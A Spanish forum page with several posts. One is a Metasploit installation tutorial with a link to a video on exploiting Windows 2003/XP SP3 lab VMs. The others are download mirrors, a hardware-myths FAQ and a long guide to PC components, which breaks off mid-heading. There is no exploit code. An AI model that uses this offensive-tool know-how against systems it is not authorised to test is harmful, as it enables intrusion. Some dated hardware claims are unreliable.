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Mensajes - Stiuvert

#2621



El Proyecto Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.

Su subproyecto más conocido es el Metasploit Framework
una herramienta para desarrollar y ejecutar exploits contra una máquina remota.

Otros subproyectos importantes son la bases de datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre Seguridad

Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl, aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el lenguaje Ruby.

En este primer articulo vamos a explicar de manera sencilla como instalarlo, lo primero es instalar las dependencias necesarias, por lo tanto en una consola y como superusuario (root)...
Código: text
sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

Una vez descargadas las dependencias si quereis actualizar las vulnerabilidades descubiertas debeis instalar...
Código: text
sudo apt-get install subversion

Por si quereis instalar modulos adicionales y compilar por vuestra cuenta....
Código: text
sudo apt-get install build-essential ruby-dev libpcap-dev


Seguidamente debeis descargar desde su pagina oficial:
32 bits: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
64 bits: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

y os meteis por ejemplo en la carpeta (en mi caso) Descargas...
Código: text
cd Descargas

Código: text
ls -l

Le dais permisos de ejecución al archivo del Metasploit...
Código: text
sudo chmod +x framework-3.5.1-linux-x86_64.run

Lo ejecutais y listo...
Código: text
sudo ./framework-3.5.1-linux-x86_64.run

Os creara o se instalará en la carpeta
Código: text
/opt/framework-3.5.1/


Si quereis ejecutarlo os meteis en ella y en la sección msf3 teneis varios ejecutables...

Yo hare un video para el GUI, pero también podeis ejecutarlo desde consola...

Modo Grafico
Código: text
sudo /opt/framework-3.5.1/msf3/msfgui

Modo COnsole
Código: text
sudo /opt/framework-3.5.1/msf3/msfconsole

Por ultimo si deseais actualizar a la ultima revision de vulnerabilidades ejecutais...
Código: text
sudo svn update /opt/framework-3.5.1/msf3/


Para Windows el proceso es más rápido, ya que incluye todas las librerias necesarias en el paquete...
Lo podeis descargar también desde: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y lo ejecutais normalmente...en la ejecución son exactamente identicos, por lo que os muestre en el proximo video desde Linux es también aplicable a Windows....


Metasploit: Uso en Linux y Windows (Parte II)

Después del primer post sobre el Metasploit donde os enseñaba a instalarlo tanto para Linux como Windows, ahora os dejo después de usar el Nmap para descubrir las posibles vulnerabilidades del Windows 2003 y Windows XP SP3 (usados en mis pruebas, bajo VirtualBox) como se usa para explotar esa vulnerabilidad en ambos sistemas...espero que os sirva.

En cuanto descubra nuevas posibilidades os dejaré mas vídeos....un saludo a todos:)

http://www.youtube.com/v/S6vxPbHOkLw

Fuente: CDL

Una Recomendacion alos que usan windows los antivirus detectaran los modulos y selos pueden eliminar esa es una, dos que algunos no trabajan bajo windows.

Pd: Stealer Aqui De Nuevo :d
#2622


DESCARGA

Mirror 1: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror 2: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror 3: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Autor: arbeygp12
#2623
Como hay mucha gente que he visto y comentarios en general que tienen ideas o conceptos muy erróneos acerca del Hardware se me ocurrió hacer está recopilación con las dudas más frecuentes que vi en mi experiencia. Cualquier adición y/o corrección a este post coméntenmelo.






1. Dos, Tres o Cuatro núcleos ¿Qué es mejor?

La realidad es depende el uso que uno le va a dar. Para el uso diario, o sea internet, office, etc, con dos núcleos es suficiente, no es notoria la presencia de más núcleos. En aplicaciones más pesadas depende de si la aplicación aprovecha todos los core o no. Por ejemplo, la mayoría de los juegos aprovechan mejor una mayor velocidad de clock en lugar de más núcleos. Aunque esta tendencia está empezando a revertirse de a poco, como en el caso del GTA IV.



2. nVIDIA es mejor que ATI ¿ATI tiene problemas de incompatibilidad?

Eso es totalmente falso. No hay problemas de incompatibilidades, ATI es muy buena marca y no tiene nada que "envidiarle" a nVIDIA. La verdad es que debido a la competencia hay épocas en las que conviene una marca sobre la otra. Por ejemplo, la línea GeFORCE 8000 de nVIDIA era bastante mejor que la serie Radeon HD3000 de ATI. Cosa que se revirtió en la serie HD4000 vs la serie 9000 e incluso algunos modelos de la serie GTX 200 de nVIDIA. En este caso, es superior ATI especialmente si tenemos en cuenta el costo.



3. ¿AMD es malo, Intel es mejor?

Es el mismo caso de ATI vs nVIDIA. Cada uno tiene sus épocas y hay líneas que son mejores que otras. Por ejemplo la línea Phenom de AMD fue un fiasco, pero la línea Phenom II es excelente. Lo mismo ha pasado en Intel. Los Pentium D dejaban bastante que desear, pero los Core 2 han sido buenísimos. Tal es así, que siguen en el mercado después de casi 3 años.



4. Las mejores son las placas de Vídeo de 2GB

Este es probablemente el mito más difundido y más errado en informática. La cantidad de memoria de una placa de video no es importante. Lo importante es el GPU, que es quien hace todo el trabajo. Hay muchos factores a tener en cuenta al elegir un GPU, cantidad de shaders, frecuencia, etc. Para simplificar esto, los fabricantes han desarrollado un sistema de numeración bastante similar tanto en nVIDIA como en ATI. Por lo general, los modelos de placa son de 4 dígitos, el primero de la izquierda indica la generación de la placa, el segundo la gama o la potencia y el tercero (en el caso de ATI) una sub-gama. Así es como una GeForce 8400GT, es inferior a una 7800GT. Porque si bien la 8400 es de una generación más nueva, es de una gama o potencia menor que la 7800. Otra cosa que hay que tener en cuenta es la velocidad de la memoria. El mismo modelo de una placa con memoria más rápida, funcionará mejor que otra con memoria más lenta aunque este último tenga mayor cantidad de la misma. El caso más representativo de esto es la 8600GT. La versión de 256MB DDR3 rendía casi el doble que el modelo con 512MB DDR2.



5. Quiero ponerle 16GB de RAM para que vaya muy rápido

En primer lugar hay que tener en cuenta que los sistemas operativos de 32 bits no reconocen más de 3,25GB. Y aunque usemos un SO de 64 bits, son muy pocas las aplicaciones hoy en día que aprovecharían más de 4GB de RAM. Además hay que tener en cuenta que no siempre el agregar RAM significa que la PC vaya a funcionar más rápido. Depende de cada configuración de hardware, e incluso de software en particular.



6. Le pongo un gabinete con fuente genérica, total... ¿Qué puede pasar?

La fuente es el componente más importante de una PC, es lo que alimenta a cada componente. Las fuentes genéricas no suelen entregar la potencia que dicen en sus etiquetas, por lo que uno está colocando algo inferior a lo que cree que está colocando. Las fuentes de marca sí entregan la potencia que dicen entregar, por lo tanto son mucho más confiables. Además las fuentes genéricas suelen tener muy poco o nada de filtrado, con lo que la calidad de la tensión es bastante pobre en el mejor de los casos. No nos olvidemos que la fuente es el único componente capaz de quemar otros componentes, e incluso toda la PC.


7. Quiero un mother ASUS porque es el mejor

Este es otro mito, la marca de los mothers. Si bien es cierto que hay marcas mejores que otras, por lo general la diferencia no es tanta como creemos. El componente principal de un mobo es le chipset, de los cuales hay pocos fabricantes. Los más conocidos son Intel, AMD, nVIDIA, VIA y SiS. De estos, los tres primeros fabrican los mejores chipsets. Pero, no todos los chipsets que fabrica Intel, por ejemplo, son buenos. Hay mejores y peores, lo mismo pasa con el resto de las marcas. De esta manera, un mother fabricado por ASUS, con un chipset AMD 780G, como por ejemplo el M4A78-EM, es casi igual que otro fabricado por ECS, con el mismo chipset, como el A780GM-A. Ambos son muy buenos mothers por tener un muy buen chipset, pero el ECS cuesta casi 40 dólares menos.



8. Poner un buen micro, y mother lo que te alcance

Este es otro gran error de concepto. El mother es el segundo componente más importante de una PC después de la fuente. Es lo que comunica la memoria con el micro y con todos los demás dispositivos de la PC. Si el mother es malo, por más que le metamos un súper micro, la PC tendrá un desempeño pobre. Es preferible siempre gastar unos pesos más en el mother y no tanto en micro. Depende también obviamente del uso que le vayamos a dar.



9. Quiero hacer un SLI/Crossfire

Hacer SLI o Crossfire no sirve porque en la mayoría de los casos no rinde el doble de potencia, mientras que nosotros tuvimos el doble de gasto en comprar dos placas de video. Sin mencionar que hay que comprar un mother que soporte el SLI/CF y una fuente acorde. Siempre comprar una VGA que supere el rendimiento de un SLI/CF es más barato. Ejemplo: 1 HD4870 es más barata que 2 HD4670.



10. Los Celeron y los Sempron son una porquería, no valen la pena, no lo pongas

Estos micros no son malos, simplemente son básicos. Están diseñados para tareas de ofimática.



11. Yo tengo un mother AMD ¿Puedo ponerle una placa nVIDIA?

Sí. La arquitectura PCI-E es un estandar, por lo tanto las placas nVIDIA funcionan perfectamente en mothers AMD y vice versa. Es un mito que las placas funcionan mejor en mothers del mismo fabricante. Lo único que hay que tener en cuenta es que no se puede hacer SLI en un mother AMD ni CrossFire en uno nVIDIA.



12. ¿Hace falta ponerle estabilizador o UPS?

Depende. Si uno vive (o trabaja) en una zona con mal servicio eléctrico, con bajones o picos frecuentes, entonces sí es conveniente. Pero hay que tener en cuenta que, para que un estabilizador o UPS sea realmente efectivo y seguro hay que tener una buena puesta a tierra. Especialmente en zonas dónde las lineas de tensión son aereas y pueden recibir descargas atmosféricas. Otra cosa a tener en cuenta es la calidad del estabilizador o UPS. Marcas recomendables son Solitec, Eaton Powerware, APC, Polaris, etc. Las marcas genéricas es mejor evitarlas ya que traen más problemas y peligros de lo que protegen.
Cabe aclarar que un estabilizador no reduce los riesgos que conlleva una fuente de mala calidad. De muy poco sirve colocar uno si la fuente es genérica.


Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2624
Son varios los componentes que forman parte de una computadora personal. Una vez que se retira la tapa del gabinete , uno se encuentra con una selva; compuesta por cables, circuitos integrados de diferentes tamaños, tarjetas, dispositivos, la fuente de alimentación y tal vez algún ventilador.

En esta post vamos a hacer un pequeño recorrido para investigar, en forma básica, cuales son las partes que conforman una computadora personal, y como se ralacionan esas partes, en una pc como la mía y la que estas usando ahora, querido Taringuero.





Bien es hora de comenzar. Si quieren lo que pueden hacer es tener a mano alguna Motherboard vieja para hacerce de referencia mientras leen el post. En caso de que no tengan, pueden retirar alguna tapa del gabinete de la PC e ir mirando mientras leen. Por favor no toquen nada dentro de la PC, salvo que esta este apagada y desconectada del tomacorriente


La Placa Base - Motherboard


La Placa Madre, o Motherboard, es el elemento principal de todo computadora, en el que se encuentran o al que se conectan todos los demás aparatos y dispositivos.

Físicamente, se trata de un cuadrado de material sintético, sobre el cual existe un circuito electronico que conecta diversos elementos que se encuentran anclados sobre ella; los principales son:

- El Zocalo o la ranura en donde va montado el Micro
- La memoria caché (l2)
- BIOS ROM
- Los zocalos en donde se encuentra la memoria RAM (DDR, DDR2)
- Conectores PCI, PCI Express
- Diversos chips opcionales
- El Chipset
- El conector eléctrico que se conecta con la fuente
- Un reloj que produce señales de reloj para sincronizar varios componentes.
- La batería CMOS
- Ventiladores
- Conectores externos (USB, MiniDIN)


Tipos de forma

Las placas existen con diversas formas y con diversos conectores para perifericos. Para abaratar los costos permitiendo la intercambiabilidad entre Placas Base, los fabricantes han ido definiendo varios estándares que agrupan recomendaciones sobre su tamño, agujeros de montaje y la dispocición de los elementos sobre ellas.



Hoy en día, el estándar es la forma ATX, el cual fue creado en 1995 por Intel.


El Microprocesador



El Microprocesador, el cual llamaremos Micro o CPU, es el cerebro de la computadora. Se encarga de tomar la información que recibe de dichas fuentes, efectuar los procesos necesarios para dicha información y enviar el resultado al destino que se le indico. A este modelo se lo conoce como EPS: Entrada de información, Procesamiento y Salida.
En su interior, el Micro posee una serie de pequeñas memorias temporales de rápido acceso llamadas Registros. En ellas almacena una serie de datos necesarios y otros fundamentales para continuar procesando instrucciones sin perderse. Debido a que los Registros se encuentran dentro del Micro, este puede acceder mucho más rápido a la información que si accediera a la memoria principal. El ancho máximo de instrucciones que puede interpretar el Micro se mide en Bits (los conocidos 8, 16, 32, 61 Bits)


¿Cómo funciona?


Cuando ejecutamos un programa instalado en el Disco Rígido de la PC, por ejemplo, Exel, lo que ocurre es que su secuencia de instrucciones se copia en la memoria principal de la computadora (la RAM), y luego, por bloques, pasa a la memoria Caché, que es la memoria interna del Micro.
Cuando el Micro comienza a realizar su trabajo, lee una orden detrás de la otra y procede a ejecutarla. Cuando esto ocurre, el programa comienza a funcionar.


Rapidez de un Microprecesador


La velocidad de trabajo de un Micro se mide en MHz (millones de ciclos por segundo), y como es logico, cuanto mayor sea ese valor, más rápido trabajará el Micro.
Para entender esto, se podría decir que la velocidad de trabajo de un Microprocesador es la velocidad con la que late su corazón. Un Procesador de 700 MHz, por ejemplo, trabaja a un ritmo de 700.000.000 pulsos por segundo, lo que significa que puede precesar 700.000.000 de ordenes en 1 segundo.


Velocidad del Micro vs. Velocidad del Motherboard

También, la velocidad de trabajo del Micro se expresa en relacióna a la velocidad de la Motherboard, que es, en realidad, la velociadad del BUS FSB al que esta conectado el Microprocesador y que puede ser de 200, 400 o 600 MHz, entre otras. El BUS FSB es un puente que comunica al Micro con la Placa Madre. Estos son los caminos por donde circulan los datos.


Ancho de Banda

El ancho de banda de un Microprocesador determina la capacidad de transferencia de información que existe entre el Microprocesador y la Motherboard. Cuanto más alto este valor, mejor, porque esto implica que los caminos por los que circulan los datos e instrucciones (el puente) resultarán mas anchos y despejados. El ancho de banda se mide en MB/s


El Coprocesador Matemático



Es el ayudante del procesador para realizar operaciones matemáticas de punto flotante, es decir que se encarga de realizar las operaciones numéricas con números fraccionarios.
Este chip aumenta el rendimiento dle procesador en aplicaciones que no utilizen números enteros, ya que le procesador pierde mucho tiempo en realizar calculos con números fraccionarios.
Actualmente, el Coprocesador Matemático se encuentra dentro del mismo Microprocesador.


La Cache




Una memoria Cache es una memoria del tipo volátil (del tipo RAM), pero con más velocidad, unas 5 o 6 veces mayor. Vale aclarar que existen muchos tipos de Caché en una computadora, pero nosotros solo nos vamos a centrar en el estudio de la que se encuentra dentro de Microprocesador.
En la actualidad esta memoria está integrada en el Microprocesador, y su cometido es almacenar una serie de instrucciones y datos a los que el procesador accede continuamente, con la finalidad de que estos accesos sean instantáneos. Estas instrucciones y datos son aquellas a las que el procesador necesita estar accediendo de forma continua, por lo que para el rendimiento del procesador es imprescindible que este acceso sea lo más rápido y fluido posible.

Hay tres tipos diferentes de memoria caché para procesadores:

Caché de 1er nivel (L1): Esta caché está integrada en el núcleo del procesador, trabajando a la misma velocidad que este. La cantidad de memoria caché L1 varía de un procesador a otro, estando normalmente entra los 64KB y los 256KB. Esta memoria suele a su vez estar dividida en dos partes dedicadas, una para instrucciones y otra para datos.

Caché de 2º nivel (L2): Integrada también en el procesador, aunque no directamente en el núcleo de este, tiene las mismas ventajas que la caché L1, aunque es algo más lenta que esta. La caché L2 suele ser mayor que la caché L1, pudiendo llegar a superar los 2MB.
A diferencia de la caché L1, esta no está dividida, y su utilización está más encaminada a programas que al sistema.

Caché de 3er nivel (L3): Es un tipo de memoria caché más lenta que la L2, muy poco utilizada en la actualidad. En un principio esta caché estaba incorporada a la placa base, no al procesador, y su velocidad de acceso era bastante más lenta que una caché de nivel 2 o 1, ya que si bien sigue siendo una memoria de una gran rapidez (muy superior a la RAM, y mucho más en la época en la que se utilizaba), depende de la comunicación entre el procesador y la placa base. Para hacernos una idea más precisa de esto, imaginemos en un extremo el procesador y en el otro la memoria RAM. Pues bien, entre ambos se encuentra la memoria caché, más rápida cuanto más cerca se encuentre del núcleo del procesador (L1).


Para que el COOLER




Normalmente, en las computadoras actuales, el Micro se encuentra debajo de un ventilador. Este ventilador es escencial para la vida del Micro, debido a que mientras este trabaja, desprende una grán cantidad de energía en forma de calor.
El ventilador, denominado FAN COOLER, no se encuentra directamente sobre el Micro, sino que va montado sobre un elemento melatico llamado DISIPADOR, el cual va agarrado por medio de unas pestañitas al zocalo del Micro y utilizando entre ellos grasa siliconada como medio disipador.
Su Micro podría DERRETIRSE si no tuviera estos elementos, o si estos estuvieran en mal estado. Es por eso que NUNCA DEBE TOCAR EL MICRO, ya que podría dañar a los elementos anteriormente mencionados.
El sintoma más claro de que un Microprocesador no cuenta con un buen sistema de enfriamiento y se calienta es que al cabo de un tiempo de funcionar, el rendimiento de la PC comienza a decaer y la máquina se vuelve pesada y lenta
Actualmente, las Motherboards modernas cuentan con un diodo termico que monitorea la temperatura del Micro en cada instante. Este censor trabaja en conjunto con el circuito que regula la velociadad de COOLER. En caso de que este sistema falle, y de que la temperatura supere los 60ºC, se activa una alarma para que el usuario apague la PC de inmediato, para no poner en riesgo la integridad del Micro.


El Chipset




El Chipset suele estar formado por varios conjuntos de microprocesadores, cada uno de los cuales tiene una misión específica, pero que funcionan en conjunto, ordenando además la comunicación entre el resto de elementos del ordenador. Existen barios tipos de Chipset, siendo los más habituales el Northbridge, el Southbridge, el Super I/O, la controladora IDE, la controladora SATA y en las placas actuales la controladora de sonido y la controladora Ethernet. Aunque en reliadad, los distintos tipos de Chipset controlan distintas funciones por separado, yo se las voy a detallar en forma general. Las funciones que más se destacan son: Gestionar la memoria RAM, los puertos gráficos, los distintos tipos de BUS, el BIOS, el reloj, el controlador DMA y de interrupciones, la potencia electrica, los puertos USB y PCI, los medios de almacenamiento, el sonido y las tarjetas de red.


La Memoria RAM




La memoria RAM es una memoria de tipo volatil (los datos que contiene se borran cuando apagamos el ordenador) que utilizan las computadoras para almacenar los datos y programas a los que necesita tener un rápido acceso.
Estas memorias tienen unos tiempos de acceso y un ancho de banda mucho más rápido que el disco duro, por lo que se han convertido en un factor determinante para la velocidad de un ordenador. Esto quiere decir que, dentro de unos límites, un ordenador irá más rápido cuanta mayor sea la cantidad de memoria RAM que tenga instalada, expresada en MegaBytes o GigaBytes.
Existen varios tipos de memoria RAM, entre los que se destacan SDRAM, DDR, DDR1, DDR2 y DDR3

Entonces surge una duda: Si la RAM y la Cache son casi lo mismo... ¿Para que esta la Cache si esta la RAM o viceversa? Debido a la gran velocidad actual de los Micros, la RAM aveces no es lo suficientemente rápida para transmitir y recibir los datos que el Micro necesita para trabajar. Es por eso que se usa la Cache (vale recordar que la Caché es 5 veces más rápida que la RAM)


La ROM BIOS




El BIOS en una chip de memoria del tipo ROM (Read Only Memory). Este chip contiene los programas de inicio, y los controladores necesarios para hechar a andar el sistema y articularse con el Software básico. La mayoría de las PCs tienen en su BIOS cuatro funciones principales

- POST: La POST prueba el Microprocesador, la memoria, el Chipset, el adaptador de video, los controladores de unidades de disco, las unidades de disco, elementos escenciales como el teclado, entre otros.

- Setup: Desde este se determina la configuración del sistema. Se trata, generalmente, de un programa operado por menú que se activa al oprimir una tecla especial durante el POST. Mediante este programa es posible configurar la Motherboard, el Chipset, la fecha y hora, las contraseñas, las unidades de disco, el sistema de arranque (BOOTEO) y el suministro de energía. Antes de que existiera este programa, las computadoras debían arrancarse desde un CD

- Cargador de instrucciones de arranque: Una rutina que lee las unidades de disco en busca del sector de arranque maestro válida (proceso que se ejecuta al cargar el Windows, por ejemplo)

- BIOS: Es la colección de controladores usados parfa actuar como una interfaz básica entre el sistema operativo y el hardware cuando el sistema arranca o cuando esta en funcionamiento. Cuando se ejecuta Windows en modo seguro (modo a prueba de errores o fallas), el sistema esta funcionando casi exclusivamente con los controladores de ROM del BIOS, pues no se carga ningún otro del disco.


La batería CMOS



La batería CMOS, o simplemente, la pila del ordenador, se encarga de conservar los parametros de la BIOS cuando el ordenador esta apagado. Sin ella, cada vez que encendieramos tendríamos que introducir las características del Disco Duro, del Chipset, la fecha y la hora, entre otros.
Esta pila se trata de un acumulador, pues se carga cuando la computadora esta encendida. Sin embargo, con el paso de los años, esta pila poco a poco se va desgastando y llega le momento en que hay que cambiarla. La vida util de esta pila es de 2 a 6 años. Un sintoma de que llega le momento de cambiar la pila es cuando la hora se atrasa mas de lo normal.


Los Slot de expansión




Los Slot de expansión de las computadoras sin lugar a dudas, son los elementos que permiten aumentar el rendimiendo y posibilidades de tu pc de muchas maneras, como por ejemplo, conectando una placa de video o una placa de red para poder acceder a internet. Son muchas las ranuras de expansión que se han inventado, pero en las Motherboards más recientes, dominan slot de expansión de 2 tipos: PCI y PCI Express, por lo que, los viejos slot de expansión, como el ISA, VESA y AGP, han quedado en desuso.

Hoy en día, casi todos los componentes, se conectan a travez del PCI o PCI Express, desde tarjeras de sonidos hasta las más potentes palcas de video, pasando a si mismo por las placas de red entre otras.

- PCI: Es la abreviación de Peripheral Component Interconnect. Hoy en día, es el Bus de ordenadores estándar para conectar dispositivos periféricos directamente a su placa base. A diferencia de los buses ISA, el bus PCI permite configuración dinámica de un dispositivo periférico. En el tiempo de arranque del sistema, las tarjetas PCI y el BIOS interactúan y negocian los recursos solicitados por la tarjeta PCI.

- PCI Express: Es muy similar al PCI, pero muchisimo más rápido que su antecesor. Posee un sistema de comunicación superior y un ancho de banda 32 veces más rápido.


Conectores externos



En las nuevas placas ATX estos conectores se encuentran directamente soldados a la Motherboard. En estos se pueden conectar los dispositivos que interactuan directamente con nosotros, como el teclado, el mouse, la impresora, el monitor, dispositivos externos tales como MP3s, Pen Drives, etc. Los principales conectores son:

- Mini-DIN: Permite conectar el teclado
- D-Sub: Se utilizan para conectar monitores principalmente
- USB: Sin duda el más famoso de todos. Abrebiación de Universal Serial Bus, es un puerto que sirve para conectar periféricos a una computadora. Todas las Placas Madres actuales poseen entre 5 o 6


El Disco Rígido - Hard Disk




El Disco Rígido es el sistema de almacenamiento más importante de una computador y es en el que se guardan los archivos de los programas - como los sistemas operativos Windows, Linux; las ojas de calculo (Exel), los archivos de texto, los juegos y todas las boludeces que tenemos en la compùtadora (Fotos, canciones, el MSN, etc)
La mayoría de los dicos rígidos de las computadoras actuales son de la tecnología SATA (Serial ATA), aunque algunas Placas Madres modernas permiten la conexión de discos del tipo IDE -solo por compactibilidad-, tecnología que se usaba hace 6 años atras.


¿Cuantos HD puedo conectar a mi PC?

Las Placas Madres actuales convencionales permiten conectar hasta 4 unidades de HD. El primer disco se conoce como Primario Master, el segundo como Primario Esclavo, el tercero como Secundario Master y el cuarto como Secundario Esclavo. El Primario Master siempre será el disco de arranque de la computadora.
La diferencia entre un disco esclavo y un disco maestro se hace mediante un pequeño puente metálico (jumper) que se coloca en unos conectores de dos patitas que tiene cada disco.


Partes del HD




Un Disco Rígido se organiza en platos (PLATTERS), y en la superficie de cada una de sus dos caras existen pistas (TRACKS) concéntricas, como surcos de un disco de vinilo, y las pistas se dividen en sectores (SECTORS).
El HD tiene una cabeza (HEAD) en cada lado de cada plato, y esta es movida por un motorservo cuando busca los datos almacenados en una pista y un sector concreto.
El concepto de cilindro (CYLINDER) es un parametro de organización: el cilindro está formado por las pistas concéntricas de cada cara de cada plato que estan situadas unas justo encima de las otras, de modo que la cabeza no tiene que moverse para acceder a diferentes pistas de un mismo cilindro.
En cuanto a la organización lógica, cuando damos formato lógico (el físico, o a bajo nivel, viene hecho de fábrica y no es recomendable hacerlo de nuevo ya que podría dejar inutilizado el disco) lo que hacemos es agrupar los sectores es unidades de asignación (CLUSTERS) que es donde se almacenan los datos de manera organizada. Cada unidad de asignación solo puede ser ocupada por un archivo (nunca dos diferentes), pero un archivo puede ocupar más de una unidad de asignación.


¿Cómo funciona?

Cuando usted o el Software le indican al sistema operativo a que deba leer o escribir a un archivo, el sistema operativo solicita al controlador del disco que translade los cabezales de lectura a la tabla de asignación de archivos (FAT). El sistema operativo lee el FAT para determinar en que punto comienza un archivo en el disco, o que partes del dico están disponibles para guardar un archivo nuevo.

Los cabezales escriben datos en los platos alalinear partículas magneticas sobre las superficies de estos. Los cabezales leen los datos de las partículas que ya se han alineado.

Es posible guardar un solo archivo en racimos diferentes sobre varios platos, comenzando con el primer racimo disponible que se encuentra. Después de que el sistema operativo escribe un nuevo archivo en el disco, se guarda una lista de todos los racimos del archivo en la FAT.


Capacidad de almcenamiento

La capacidad de almacenamiento de un disco hace referencia a la cantidad de información que puede grabarse o almacenarce en este. Hoy en día es posible encontrar discos con capacidades de almacenamiendo de más de 1 TB (1024 GB), aunque no son muy comunes. El estandar se encuentra actualmente en 350 a 500 GB.


Velocidad de rotación (RPM)

Es la velocidad con la que gira un disco, más exactamente, la velocidad a la que giran los platos del disco, que es donde se almacena magneticamente los datos. La velocidad a la que gira se mide en RPM. Normalmente, los dicos girán a más de 7200 RPM.
La regla es simple: a mayor RPM, mayor transferencia de datos, pero más ruido y mayor calor.


Tiempo de acceso - Access Time

Es el tiempo que tarda la cabeza del disco en acceder a los datos que necesitamos. Este tiempo deriva de la suma de varias velocidades:

- El tiempo que tarda el disco en cambiar de una cabeza a otra cuando busca un dato
- El tiempo que tarda la cabeza lectora en buscar la pista con los datos saltando de una a otra
- El tiempo que tarda la cabeza lectora en buscxar el sector correcto dentro de la pista

Es uno de los factores más importantes a la hora de escoger un disco.


Algunos datos valiosos: La desfragmentación, formateo y escaneo de un disco




Al transcurrir un tiempo de uso de la PC, es posible que el acceso a los archivos se vuelva más lento ya que los datos se encuentran fragmentados porque se almacenan en posiciones diferentes en el disco y es por eso que la computadora le lleva tiempo encontrar, leer y escribir el disco. Existen muchos programas que permiten desfragmentar el disco. El propio Windows trae un desfragmentador de disco, pero aveces este no da muy buenos resultados. Es por eso que recomiendo la utilización de programas como Perfect Disk o Tune Up Utilities.

Cada vez que desinstalamos un programa, quedan archivos en el disco que son imposibles de borrar. Es por eso, que una vez al año hay que formatear los discos de la computadora. Se pueden formatear discos desde el Windows, a condición de que estos no posean archivos del sistema operativo. En el caso de que necesitemos formatear el disco Primario Master -el que contiene el sistema operativo- lo que debemos hacer es instalar el Sistema Operativo nuevamente.

Si uno tiene problemas de archivos, lo primero que uno puede llegar a pensar es que nuestra máquina esta infectada por un virus. Sin embargo, muchas veces los problemas pueden venir de un defecto de almacenamiento de los archivos o por defecto propio de los cluster del disco rígido. ScanDisk de Windows y otros programas como Tunu Up Utilities y Perfect Disk verifican los archivos y las carpetas para encontrar errores de datos y también pueden verificar la superficie física dle disco.


La Fuente de Alimentación





La fuente de alimentación externa es la responsable de convertir la electricidad convencional en alguna forma que la computadora pueda utilizar. Una funte de alimentación convencional, esta compuesta por las siguientes partes:

Cable de alimentación: Es el cable negro que conecta la fuente al tomacorriente. Normalmente es desmontable, en un extremo debe tener una ficha de tres patas planas (con toma a tierra) según las normas IRAM.

Conectores de Alimentación de la Motherboard: Es un conjunto de cables que suministran la energía a la Motherboard





Conectores de Alimentación de Drivers: Hay generalmente tres o cuatro conectores de cuatro cables para las unidades de disco y de CD-ROM.

Ventilador de la Fuente: Las fuentes de alimentación cuenta con un ventilador (en algunos casos dos) con fines de refrigeración de la fuente y del sistema en general (normalmente hay otro ventilador de apoyo). Estos ventiladores tiran aire hacia el exterior del gabinete, creando un vacio y permitiendo que el aire fresco del exterior entre por unas averturas especiales.


¿Cómo funciona?

Como ya he dicho antes, la fuente de alimentación externa es la responsable de convertir la electricidad convencional en alguna forma que la computadora pueda utilizar. Para lograr esto la fuente debe segir una serie de procesos electronicos que detallaré a continuación:

1. Transformación: Lo primero que debe hacer la fuente de alimentación consiste en reducir la tensiónd de entrada a la fuente (220v o 110v) que son los que otorga la red electrica y trasformarlo en una salida +/- 5 a +/- 12 voltios (en las ATX con el opcional de + 3.3 voltios) que es el rango de tensiones que manejan los elementos internos del CPU

2. Rectificación: La corriente que nos ofrece la compañía eléctrica es alterna, esto quiere decir, que sufre variaciones en su linea de tiempo, con variaciones, nos referimos a variaciones de voltajes, por tanto, la tensión es variable, no siempre es la misma.
Eso lógicamente, no nos podría servir para alimentar a los componentes de un PC, ya que imaginemos que si le estamos dando 12 voltios con corriente alterna a un disco duro, lógicamente no funcionará ya que al ser variable, no estariamos ofreciendole los 12 voltios constantes.
Lo que se intenta con esta fase, es pasar de corriente alterna a corriente continua, a través de un componente que se llama puente rectificador o de Graetz.
Con esto se logra que el voltaje no baje de 0 voltios, y siempre se mantenga por encima de esta cifra.

3. Filtrado: Ahora ya, disponemos de corriente continua, que es lo que nos interesaba, no obstante, aun no nos sirve de nada, porque no es constante, y no nos serviría para alimentar a ningun circuito
Lo que se hace en esta fase de filtrado, es aplanar al máximo la señal, para que no hayan oscilaciones, se consigue con uno o varios condensadores, que retienen la corriente y la dejan pasar lentamente para suavizar la señal, así se logra el efecto deseado.

4. Estabilización: Ya tenemos una señal continua bastante decente, casi del todo plana, ahora solo nos falta estabilizarla por completo, para que cuando aumenta o descienda la señal de entrada a la fuente, no afecte a la salida de la misma. Esto se consigue con un regulador.


La señal Power Good

Cuando la fuente de alimentación se enciende, toma cierto tiempo para que los componentes internos esten a pleno funcionamiento y producir los voltajes apropiados de corriente continua (CC) que la computadora necesita para trabajar. Si antes de que se estabilice la fuente, la computadora ha comenzado con su proceso de arranque, se producirán resultrado erroneos debido a que la fuente no esta con el voltaje correcto. Puede durar medio segundo a que la computadora se estabilice, y esto es una eternidad para el Microprocesador que puede ejecutar más de 300.000.000 de instrucciones por segundo!. Para evitar que la PC arranque prematuramente, luego de que la alimentación esta lista para ser utilizada, la fuente le envía una señal a la Motherboard llamada Power Good -energía buena-. Hasta que esta señal no sea enviada, la Motherboard no arrancará la PC.


La señal Power On

En las viejas funtes, como las AT, al uno apagar la PC le aparecía un cartel en la pantalla con la inscripción Puede apagar la PC hora. En las nuevas fuentes ATX, esto ya no sucede, ya que con la señal Powen On -encendido- la Motherboard le indica a la Fuente de Alimentación cuando apagarse por si misma, por lo que ya no hay que apretar el botón de encendido para apagar la fuente.


El Monitor

El monitor es una parte de la computadora a la que muchas veces no le damos la importancia que se merece. Hay que tener en cuenta que, junto con el teclado y el mouse, son las partes que interactuan con nuestro cuerpo. Hay varios tipos de monitores, tales como:

- Monitores Monocromáticos -en desuso-
- Monitores de Tubod de Rayos Catódicos (CRT)
- Monitores de Cristal Líquido (LCD)

También se pueden encontrar Monitores de Plasma y de Leds, pero estos son muy raros encontrarlos en el mercado y no se usan practicamente en una computadora personal.


Los Monitores CRT: Composición y funcionamiento

